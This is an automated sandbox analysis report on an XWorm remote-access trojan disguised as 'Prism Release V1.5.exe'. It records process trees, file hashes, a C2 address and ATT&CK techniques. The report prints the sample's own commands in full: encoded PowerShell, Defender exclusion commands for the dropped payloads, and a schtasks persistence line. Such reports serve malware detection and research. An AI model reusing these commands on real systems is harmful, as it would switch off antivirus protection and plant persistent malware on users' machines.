Malware Analysis Report

2024-09-11 13:52

Sample ID 240615-knlwcavajg
Target Prism Release V1.5.exe
SHA256 b61ca7c42fef43547c7892c76a925ec4a846373bfcde20426c913a4390f71001
Tags
xworm execution persistence rat trojan spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

b61ca7c42fef43547c7892c76a925ec4a846373bfcde20426c913a4390f71001

Threat Level: Known bad

The file Prism Release V1.5.exe was found to be: Known bad.

Malicious Activity Summary

xworm execution persistence rat trojan spyware stealer

Xworm

Detect Xworm Payload

Command and Scripting Interpreter: PowerShell

Checks computer location settings

Executes dropped EXE

Loads dropped DLL

Drops startup file

Reads user/profile data of web browsers

Adds Run key to start application

Looks up external IP address via web service

Unsigned PE

Enumerates physical storage devices

Suspicious behavior: AddClipboardFormatListener

Modifies registry class

Suspicious behavior: EnumeratesProcesses

Creates scheduled task(s)

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Uses Task Scheduler COM API

Kills process with taskkill

Suspicious use of SetWindowsHookEx

MITRE ATT&CK Matrix V13

Initial Access
TA0001
Execution
TA0002
Command and Scripting Interpreter
T1059
PowerShell
T1059.001
Scheduled Task/Job
T1053
Persistence
TA0003
Boot or Logon Autostart Execution
T1547
Registry Run Keys / Startup Folder
T1547.001
Scheduled Task/Job
T1053
Privilege Escalation
TA0004
Boot or Logon Autostart Execution
T1547
Registry Run Keys / Startup Folder
T1547.001
Scheduled Task/Job
T1053
Defense Evasion
TA0005
Modify Registry
T1112
Credential Access
TA0006
Unsecured Credentials
T1552
Credentials In Files
T1552.001
Discovery
TA0007
System Information Discovery
T1082
Query Registry
T1012
Lateral Movement
TA0008
Collection
TA0009
Data from Local System
T1005
Exfiltration
TA0010
Command and Control
TA0011
Impact
TA0040
Resource Development
TA0042
Reconnaissance
TA0043

Analysis: static1

Detonation Overview

Reported

2024-06-15 08:44

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-15 08:44

Reported

2024-06-15 08:47

Platform

win7-20240611-en

Max time kernel

147s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Xworm

trojan rat xworm

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Runtime.lnk C:\Users\Admin\dllhost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Runtime.lnk C:\Users\Admin\dllhost.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\dllhost.exe N/A
N/A N/A C:\Users\Admin\Prism Executor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2636_133629147179158000\nexusloader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\zohdbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1576_133629147928502000\svchost.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe N/A
N/A N/A C:\Users\Admin\Prism Executor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2636_133629147179158000\nexusloader.exe N/A
N/A N/A C:\Users\Admin\dllhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\zohdbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1576_133629147928502000\svchost.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Runtime = "C:\\ProgramData\\Windows Runtime.exe" C:\Users\Admin\dllhost.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Users\Admin\dllhost.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\dllhost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\dllhost.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\dllhost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2484 wrote to memory of 1768 N/A C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2484 wrote to memory of 1768 N/A C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2484 wrote to memory of 1768 N/A C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2484 wrote to memory of 1768 N/A C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2484 wrote to memory of 2428 N/A C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2484 wrote to memory of 2428 N/A C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2484 wrote to memory of 2428 N/A C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2484 wrote to memory of 2428 N/A C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2484 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe C:\Users\Admin\dllhost.exe
PID 2484 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe C:\Users\Admin\dllhost.exe
PID 2484 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe C:\Users\Admin\dllhost.exe
PID 2484 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe C:\Users\Admin\dllhost.exe
PID 2484 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe C:\Users\Admin\Prism Executor.exe
PID 2484 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe C:\Users\Admin\Prism Executor.exe
PID 2484 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe C:\Users\Admin\Prism Executor.exe
PID 2484 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe C:\Users\Admin\Prism Executor.exe
PID 2636 wrote to memory of 332 N/A C:\Users\Admin\Prism Executor.exe C:\Users\Admin\AppData\Local\Temp\onefile_2636_133629147179158000\nexusloader.exe
PID 2636 wrote to memory of 332 N/A C:\Users\Admin\Prism Executor.exe C:\Users\Admin\AppData\Local\Temp\onefile_2636_133629147179158000\nexusloader.exe
PID 2636 wrote to memory of 332 N/A C:\Users\Admin\Prism Executor.exe C:\Users\Admin\AppData\Local\Temp\onefile_2636_133629147179158000\nexusloader.exe
PID 2720 wrote to memory of 1784 N/A C:\Users\Admin\dllhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2720 wrote to memory of 1784 N/A C:\Users\Admin\dllhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2720 wrote to memory of 1784 N/A C:\Users\Admin\dllhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2720 wrote to memory of 860 N/A C:\Users\Admin\dllhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2720 wrote to memory of 860 N/A C:\Users\Admin\dllhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2720 wrote to memory of 860 N/A C:\Users\Admin\dllhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2720 wrote to memory of 740 N/A C:\Users\Admin\dllhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2720 wrote to memory of 740 N/A C:\Users\Admin\dllhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2720 wrote to memory of 740 N/A C:\Users\Admin\dllhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2720 wrote to memory of 1612 N/A C:\Users\Admin\dllhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2720 wrote to memory of 1612 N/A C:\Users\Admin\dllhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2720 wrote to memory of 1612 N/A C:\Users\Admin\dllhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2720 wrote to memory of 1748 N/A C:\Users\Admin\dllhost.exe C:\Windows\System32\schtasks.exe
PID 2720 wrote to memory of 1748 N/A C:\Users\Admin\dllhost.exe C:\Windows\System32\schtasks.exe
PID 2720 wrote to memory of 1748 N/A C:\Users\Admin\dllhost.exe C:\Windows\System32\schtasks.exe
PID 2720 wrote to memory of 1576 N/A C:\Users\Admin\dllhost.exe C:\Users\Admin\AppData\Local\Temp\zohdbc.exe
PID 2720 wrote to memory of 1576 N/A C:\Users\Admin\dllhost.exe C:\Users\Admin\AppData\Local\Temp\zohdbc.exe
PID 2720 wrote to memory of 1576 N/A C:\Users\Admin\dllhost.exe C:\Users\Admin\AppData\Local\Temp\zohdbc.exe
PID 1576 wrote to memory of 820 N/A C:\Users\Admin\AppData\Local\Temp\zohdbc.exe C:\Users\Admin\AppData\Local\Temp\onefile_1576_133629147928502000\svchost.exe
PID 1576 wrote to memory of 820 N/A C:\Users\Admin\AppData\Local\Temp\zohdbc.exe C:\Users\Admin\AppData\Local\Temp\onefile_1576_133629147928502000\svchost.exe
PID 1576 wrote to memory of 820 N/A C:\Users\Admin\AppData\Local\Temp\zohdbc.exe C:\Users\Admin\AppData\Local\Temp\onefile_1576_133629147928502000\svchost.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe

"C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAdABtACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHEAegBnACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcALgBnAGcALwBnAGUAdABwAHIAaQBzAG0AIAAtACAAUgB1AG4AIABBAHMAIABBAGQAbQBpAG4AIABJAGYAIABJAG4AagBlAGMAdABpAG8AbgAgAEYAYQBpAGwAcwAnACwAJwAnACwAJwBPAEsAJwAsACcASQBuAGYAbwByAG0AYQB0AGkAbwBuACcAKQA8ACMAdQBzAGQAIwA+AA=="

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAdAB2ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAcQB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdQBwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAdwBhACMAPgA="

C:\Users\Admin\dllhost.exe

"C:\Users\Admin\dllhost.exe"

C:\Users\Admin\Prism Executor.exe

"C:\Users\Admin\Prism Executor.exe"

C:\Users\Admin\AppData\Local\Temp\onefile_2636_133629147179158000\nexusloader.exe

"C:\Users\Admin\Prism Executor.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\dllhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'dllhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Windows Runtime.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Runtime.exe'

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Runtime" /tr "C:\ProgramData\Windows Runtime.exe"

C:\Windows\explorer.exe

"C:\Windows\explorer.exe"

C:\Windows\system32\taskeng.exe

taskeng.exe {564574B8-2846-46D1-A3B6-9AA79E6F5D1E} S-1-5-21-1340930862-1405011213-2821322012-1000:TICCAUTD\Admin:Interactive:[1]

C:\Users\Admin\AppData\Local\Temp\zohdbc.exe

"C:\Users\Admin\AppData\Local\Temp\zohdbc.exe"

C:\Users\Admin\AppData\Local\Temp\onefile_1576_133629147928502000\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\zohdbc.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
NL 91.92.241.69:5555 tcp

Files

\Users\Admin\dllhost.exe

MD5 4a7f75343aaa5a4d8d18add50ccf3139
SHA1 110c62eee6d7deb4aa9d601c942eae43482d2125
SHA256 34be6a934fd45752e788f9ba20943c8e52d91732d76e9f30a5176e98dccd956e
SHA512 1f1516fc41e0b90d0d47e306da15a542799425159f4ad476cf4fd88b9b56d200c79c72ce29ca5b0acf2a195cabe803c37c72b8d76e99a69a04dbfe1fb9f9fc79

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 6cc5f2687f2a665534a9c9d2c2c5d571
SHA1 57e8376734a36ec45383c559d8e01a2b5be0bec7
SHA256 b8bea798f9af6c4e33c329cfbba6836289399112c155de53c69448e442430a70
SHA512 ff47f6dba9fe13b36590b0ab0659f13d4f131c9c2060bbc20718ac8323f917a788f5f8eb7e0f23374452f4a1446f82afc5dff2935ef9e88879d08a40e837964f

\Users\Admin\Prism Executor.exe

MD5 fa819e23d8fee4ea89aaaea55e0b28f5
SHA1 18335d4e0d140dcab66c7197c57f669251898ce5
SHA256 bb4fbbf322982321c56ac48cb7939ef7cb823b510a184c41e284f2cdf1bab68c
SHA512 e6170df5c8705e96a76cb3b366c9410c8f8e5c5dd5753de9be87e47a1c989b4723dd655e3355d52096f7acd3185a5469ed5bf284e7765e9519522ae132cef07d

memory/2720-18-0x00000000011A0000-0x00000000011BA000-memory.dmp

\Users\Admin\AppData\Local\Temp\onefile_2636_133629147179158000\nexusloader.exe

MD5 58545dc488990ac11872079d119f8284
SHA1 dade5c16834d582a5187041697cc5a7c2eae2f88
SHA256 6669bd79928492ab626c6cc64de35e3da76d655bbd197b5cc644584014fea5bc
SHA512 93d6e3f6a2ff03b4b58db7c04f8ad00e5c5f95eceefd199b73a8af6009ef381f758825ebe3d0d3076f917299c850b2859fb2ec35eeef59126617d2a0ec54dcd7

C:\Users\Admin\AppData\Local\Temp\onefile_2636_133629147179158000\python310.dll

MD5 384349987b60775d6fc3a6d202c3e1bd
SHA1 701cb80c55f859ad4a31c53aa744a00d61e467e5
SHA256 f281c2e252ed59dd96726dbb2de529a2b07b818e9cc3799d1ffa9883e3028ed8
SHA512 6bf3ef9f08f4fc07461b6ea8d9822568ad0a0f211e471b990f62c6713adb7b6be28b90f206a4ec0673b92bae99597d1c7785381e486f6091265c7df85ff0f9b5

memory/1784-954-0x000000001B730000-0x000000001BA12000-memory.dmp

memory/1784-955-0x00000000020C0000-0x00000000020C8000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 7a9d1c19cacd312219e8b3f263b6e98d
SHA1 4b5eec3c52faa2ba8e8ff52444fe8b37675f6750
SHA256 8858d129f3fe4908517468c7f7e0dba6229d3474df036d53da3f1032765660ad
SHA512 b89d523b9ee18c764dd3ca4d4f52897315f46d2384a2548f82352dc1a4c4f2e0eeace7451e337c89a21079ead7144e601d16c7546dddae557c018aa907ff2e06

\Users\Admin\AppData\Local\Temp\zohdbc.exe

MD5 32004d8a59efe46298e06798a1a96cb9
SHA1 da3c34b6d7d4f692e673e45dacc825b3ef17a2ed
SHA256 03ca5525ec9b76e0d61787679977fff9ed515e7c9d30100ba7d8499a8b62a47f
SHA512 34c25e4b7ec2f61c6df8da73a720a91ec01762b06be8b12308876711e6a3b44f2633b27a38f2c516ff0925cb5829b70e993167e989ceb9a328d7422f7ab41495

\Users\Admin\AppData\Local\Temp\onefile_1576_133629147928502000\svchost.exe

MD5 473d542fefe26be37736dc09341747bf
SHA1 359cadaafa2f5c032cc300a9097467de701a816c
SHA256 f88890e37c4d16601fad17152fea87947f4098ac3903f138250fa3482bd3bafc
SHA512 01c08a86156b2bc3745c62bea2a787b9635a71a61595b0ddccec976e39fc50ec1547daa15aa301f4109a6bbf99b772f1d427b14a581c5dcfc1a0651e4c79fb16

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-15 08:44

Reported

2024-06-15 08:47

Platform

win10v2004-20240226-en

Max time kernel

107s

Max time network

127s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Xworm

trojan rat xworm

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation C:\Users\Admin\dllhost.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Runtime.lnk C:\Users\Admin\dllhost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Runtime.lnk C:\Users\Admin\dllhost.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\dllhost.exe N/A
N/A N/A C:\Users\Admin\Prism Executor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe N/A
N/A N/A C:\ProgramData\Windows Runtime.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cffckp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe N/A
N/A N/A C:\ProgramData\Windows Runtime.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
